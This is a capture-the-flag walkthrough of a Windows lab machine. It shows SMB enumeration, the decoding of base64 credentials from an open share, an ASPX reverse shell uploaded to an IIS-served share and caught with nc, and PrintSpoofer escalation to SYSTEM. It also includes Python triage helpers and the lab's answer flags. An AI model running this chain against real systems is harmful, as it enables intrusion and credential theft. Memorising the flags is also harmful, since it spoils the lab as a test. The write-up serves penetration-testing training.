Service discovery
┌──(root㉿kali)-[~]
└─# nmap -sV -Pn 10.10.150.167 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 04:20 EDT
Nmap scan report for 10.10.150.167
Host is up (0.32s latency).
Not shown: 65527 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
49663/tcp open  http          Microsoft IIS httpd 10.0
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 448.90 seconds
Analysis
Ports 80 and 49663 both serve HTTP (IIS 10.0); directory brute-forcing turned up nothing interesting on either.
Port 445 looked like it might be vulnerable to EternalBlue (MS17-010), but the exploit attempt failed. Note that Nmap's "Windows Server 2008 R2 - 2012" guess is only a banner-based range; the shell obtained later reports build 10.0.14393 (Windows Server 2016), so that guess is not a reliable basis for choosing an SMB exploit.
SMB enumeration over the guest account shows a passwords.txt file in \\10.10.150.167\nt4wrksv. The same scan also shows that the nt4wrksv share is READ/WRITE for the guest user, which is what makes the later upload possible.
┌──(root㉿kali)-[~/tryhackme]
└─# nmap --script "safe or smb-enum-*" -p 445 10.10.207.135 > smb.txt

| smb-enum-shares:
|   account_used: guest
|   \\10.10.150.167\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.150.167\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.150.167\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.150.167\nt4wrksv:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|_    Current user access: READ/WRITE
| smb-ls: Volume \\10.10.150.167\nt4wrksv
| SIZE   TIME                 FILENAME
| <DIR>  2020-07-25T15:10:05  .
| <DIR>  2020-07-25T15:10:05  ..
| 98     2020-07-25T15:13:05  passwords.txt
|_
Connect to //10.10.150.167/nt4wrksv without credentials (just press Enter at the password prompt) and download passwords.txt:
┌──(root㉿kali)-[~]
└─# smbclient //10.10.150.167/nt4wrksv
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  8 06:09:40 2021
  ..                                  D        0  Wed Sep  8 06:09:40 2021
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020

                7735807 blocks of size 4096. 5137057 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> ^C
Opening passwords.txt locally shows a set of encoded user credentials (the file header itself says "Encoded", not encrypted):
┌──(root㉿kali)-[~]
└─# cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
The trailing == on the first string is base64 padding, so these are base64 encoded (not encrypted: anyone who can read the share can recover them). Decode them in HackBar or with base64 -d:
Encoded: Qm9iIC0gIVBAJCRXMHJEITEyMw==
Decoded: Bob - !P@$$W0rD!123
Encoded: QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Decoded: Bill - Juw4nnaM4n420696969!$$$
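As an added example (not part of the original writeup), a small Python helper that does the decode step above without HackBar: it reads a constructed copy of passwords.txt, keeps only lines that are syntactically valid base64, decodes them, and splits on the " - " separator seen in the decoded output, so the [User Passwords - Encoded] header and any junk lines are skipped instead of aborting the decode. The file contents are copied from the output above; the function names are mine.

```python
import base64
import binascii
import re

# Constructed copy of the passwords.txt contents shown above.
PASSWORDS_TXT = """[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
"""

# Standard base64 alphabet with at most two '=' padding characters.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(token: str) -> bool:
    """Cheap syntactic check: alphabet plus a length that is a multiple of 4."""
    return bool(B64_RE.match(token)) and len(token) % 4 == 0


def decode_credential_line(line: str):
    """Return (user, password) for a base64 'User - Pass' line, else None."""
    token = line.strip()
    if not looks_like_base64(token):
        return None
    try:
        # validate=True rejects characters outside the base64 alphabet.
        plain = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = plain.partition(" - ")
    if not sep:
        # Valid base64 but not in the 'User - Pass' layout this file uses.
        return None
    return user, password


def parse_passwords_file(text: str):
    """Decode every credential line in the file, skipping anything else."""
    creds = []
    for line in text.splitlines():
        pair = decode_credential_line(line)
        if pair:
            creds.append(pair)
    return creds


if __name__ == "__main__":
    for user, password in parse_passwords_file(PASSWORDS_TXT):
        print(f"{user}: {password}")
```

The same parser works on a larger dump from a share: feed it the file contents and it returns only the lines that actually decode to a credential pair.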
So which service do these two credentials belong to?
Since port 3389 is open, I assumed they were Remote Desktop accounts and tried to log in with them, but both attempts failed.
However, opening http://10.10.150.167:49663/nt... shows the same file, which means the share directory sits inside a path that IIS serves (the shell obtained later confirms it is C:\inetpub\wwwroot\nt4wrksv). Since the share is writable over SMB as guest, we can upload an ASPX file there and then request it over HTTP, and IIS will execute it and give us a reverse shell.
Upload an ASPX reverse shell; the payload used is from https://github.com/borjmz/asp... (set the listener address and port in the payload to the attacking machine first; here that is 10.13.21.169:1234, as the nc output below shows):
┌──(root㉿kali)-[~]
└─# smbclient //10.10.150.167/nt4wrksv
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> put /root/tryhackme/revreverse_shell.apsx revse_shell.php
smb: \> put /root/tryhackme/reverse_shell.apsx ./shell.aspx
putting file /root/tryhackme/reverse_shell.apsx as \shell.aspx (11.7 kb/s) (average 11.7 kb/s)
smb: \> ls
  .                                   D        0  Thu Sep  9 04:33:54 2021
  ..                                  D        0  Thu Sep  9 04:33:54 2021
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020
  shell.aspx                          A    15492  Thu Sep  9 04:33:55 2021

                7735807 blocks of size 4096. 5134626 blocks available
smb: \>
With nc already listening, request http://10.10.150.167:49663/nt... in the browser and the reverse shell comes back, running as the IIS application pool identity:
┌──(root㉿kali)-[~/tryhackme]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.150.167] 49893
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>
Get the user flag:
c:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
Run whoami /priv to see which privileges the current account holds on the system:
PS C:\inetpub\wwwroot\nt4wrksv> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeImpersonatePrivilege is enabled for the current account, which means token impersonation can be used to escalate privileges: a process holding it may impersonate any client that authenticates to a named pipe it controls, including SYSTEM services. PrintSpoofer abuses exactly this by coercing the Print Spooler service into connecting to a named pipe the attacker created, then impersonating the resulting SYSTEM token; it therefore needs the Spooler service to be running on the target.
Download the 64-bit PrintSpoofer64.exe from https://github.com/itm4n/Prin... and upload it to the Windows target through the same SMB share, so it lands in C:\inetpub\wwwroot\nt4wrksv next to the web shell.
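Added example, not from the original post: a Python triage helper for whoami /priv output. It parses a constructed copy of the table above and flags privileges that commonly lead straight to SYSTEM. The HIGH_VALUE mapping is the editor's summary of well-known escalation paths, not something the page states. Held-but-disabled privileges are reported too, because a privilege present in the token can be re-enabled by the process itself (AdjustTokenPrivileges), which is why SeAssignPrimaryTokenPrivilege above is still relevant even though it shows Disabled; only privileges absent from the token are out of reach.

```python
import re

# Constructed sample mirroring the whoami /priv output shown above.
WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that commonly give a direct path to SYSTEM, with the usual
# technique. This mapping is the editor's summary, not taken from the page.
HIGH_VALUE = {
    "SeImpersonatePrivilege": "token impersonation (PrintSpoofer, Potato family)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation (Potato family)",
    "SeBackupPrivilege": "read any file, e.g. SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file or registry key",
    "SeDebugPrivilege": "open any process, e.g. dump or inject into lsass.exe",
    "SeTakeOwnershipPrivilege": "take ownership of files or registry keys",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeManageVolumePrivilege": "raw volume access",
}

# One table row: name, free-text description, then Enabled/Disabled.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str):
    """Return {privilege: (description, enabled)} parsed from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            privs[m.group(1)] = (m.group(2).strip(), m.group(3) == "Enabled")
    return privs


def triage(privs):
    """List (privilege, enabled, technique) for every high-value privilege held.

    Disabled entries are kept on purpose: the token holds them, so the process
    can enable them itself; only privileges missing from the token are unusable.
    """
    return [
        (name, enabled, HIGH_VALUE[name])
        for name, (_, enabled) in privs.items()
        if name in HIGH_VALUE
    ]


if __name__ == "__main__":
    for name, enabled, technique in triage(parse_whoami_priv(WHOAMI_PRIV)):
        state = "Enabled" if enabled else "Disabled (can be enabled by the process)"
        print(f"{name:32} {state:45} -> {technique}")
```

Paste the output of whoami /priv from the target into WHOAMI_PRIV (or read it from a file) and the triage list tells you which escalation family to try first; on this box it points at SeImpersonatePrivilege, which is what PrintSpoofer uses below.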
Privilege escalation
PS C:\inetpub\wwwroot\nt4wrksv> .\PrintSpoofer64.exe -i -c cmd
.\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
Here -i keeps the spawned process interactive in the current console and -c gives the command to run as SYSTEM. Get the root flag:
PS C:\users\administrator\desktop> type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
PS C:\users\administrator\desktop>